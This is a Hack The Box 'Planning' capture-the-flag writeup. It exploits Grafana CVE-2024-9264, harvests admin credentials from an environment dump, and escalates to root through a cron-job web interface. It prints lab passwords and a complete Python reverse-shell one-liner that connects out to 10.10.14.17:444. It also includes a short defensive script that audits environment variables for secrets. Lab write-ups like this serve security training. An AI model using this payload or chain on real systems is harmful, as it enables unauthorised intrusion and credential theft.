HTB-Planning Writeup

Shreyas D R

Enumeration:

Webpage:

I used a top 10000 wordlist with ffuf.

I obtained a Grafana page with htb.

I added this to my /etc/hosts.

After checking the version I found CVE-2024-9264.

Now executing the exploit:

Make sure to keep the netcat running on a different terminal:

I got the reverse shell where env revealed passwords and the user to me:


root@7ce659d667d7:~# env
env
AWS_AUTH_SESSION_DURATION=15m
HOSTNAME=7ce659d667d7
PWD=/usr/share/grafana
AWS_AUTH_AssumeRoleEnabled=true
GF_PATHS_HOME=/usr/share/grafana
AWS_CW_LIST_METRICS_PAGE_LIMIT=500
HOME=/usr/share/grafana
AWS_AUTH_EXTERNAL_ID=
SHLVL=2
GF_PATHS_PROVISIONING=/etc/grafana/provisioning
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo
GF_PATHS_DATA=/var/lib/grafana
GF_PATHS_LOGS=/var/log/grafana
PATH=/usr/local/bin:/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
AWS_AUTH_AllowedAuthProviders=default,keys,credentials
GF_PATHS_PLUGINS=/var/lib/grafana/plugins
GF_PATHS_CONFIG=/etc/grafana/grafana.ini
_=/usr/bin/env
root@7ce659d667d7:~# clear     
clear
TERM environment variable not set.

We got creds:

GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo
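
From the defender's side, the dump above is the finding: an admin password sits in the container environment, readable by any process in it. The check below is an added example, not part of the original writeup; the name heuristic and the /run/secrets path are assumptions, and the sample dump is constructed with a placeholder password.

```python
import re

# Name fragments that usually mark a credential-bearing variable (assumed heuristic).
SECRET_NAME = re.compile(r"(PASSWORD|PASSWD|SECRET|TOKEN|API_?KEY|PRIVATE_KEY)", re.I)

# Constructed sample modelled on the dump above; the password value is a placeholder.
SAMPLE_ENV = """\
HOSTNAME=7ce659d667d7
AWS_AUTH_EXTERNAL_ID=
GF_PATHS_CONFIG=/etc/grafana/grafana.ini
GF_SECURITY_ADMIN_USER=enzo
GF_SECURITY_ADMIN_PASSWORD=constructed-placeholder
GF_DATABASE_PASSWORD__FILE=/run/secrets/db_password
"""

def audit_env(dump):
    """Return findings for variables that carry a secret inline; values are never echoed."""
    findings = []
    for line in dump.splitlines():
        name, sep, value = line.partition("=")
        if not sep or not SECRET_NAME.search(name):
            continue  # not KEY=VALUE, or the name does not look like a credential
        if name.endswith("__FILE") or not value:
            continue  # file reference or empty value: no secret in the environment
        finding = {"name": name, "length": len(value)}
        if name.startswith("GF_"):
            # Grafana's container image reads GF_<SECTION>_<KEY>__FILE from a file path.
            finding["suggest"] = name + "__FILE=/run/secrets/" + name.lower()
        findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in audit_env(SAMPLE_ENV):
        print(f)
```

Run it against the output of env inside each container image before deployment; a non-empty result means a secret should move to a mounted file and should not be reused for an OS account.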

Now time to ssh into enzo:

I found the user flag on home itself:

Now I started searching around and found absolutely nothing, partly because my stupid ass forgot to search ‘/’.

I spent a lot of time here for absolutely no reason.

Now we note that there is a docker running that runs cleanup.sh for a set interval and we note the creds:

The creds we got here were:

root
P4ssw0rdS0pRi0T3c

Now I needed to figure out how to use the creds, so I started searching running services.

Then I noticed port 8000 being active, so I forwarded it to make it viewable through my browser:

tcp 127.0.0.1:8000 0.0.0.0:* LISTEN -
then 
ssh enzo@planning.htb -L 8000:127.0.0.1:8000

So in my localhost:8000, I found after entering the creds we got earlier:

It is easy to figure out from here, since all I need to do is set up a reverse shell somehow.

Then it was all about creating a shell again, so I created a python payload to give us a shell that can be pasted as a job.

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.17',444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

Then I pasted it as a command in the job:

Now again I set up a netcat listening at 444 where I finally got the shell.

Then of course the root flag was present in the home directory.

We got the flag yayyy!!!

I rate the difficulty a 7/10 since it took me 5 days to figure out (I was busy too lol, but I did invest proper time into this so I'm satisfied).

As usual, see you guys in the next one. Take care!!!
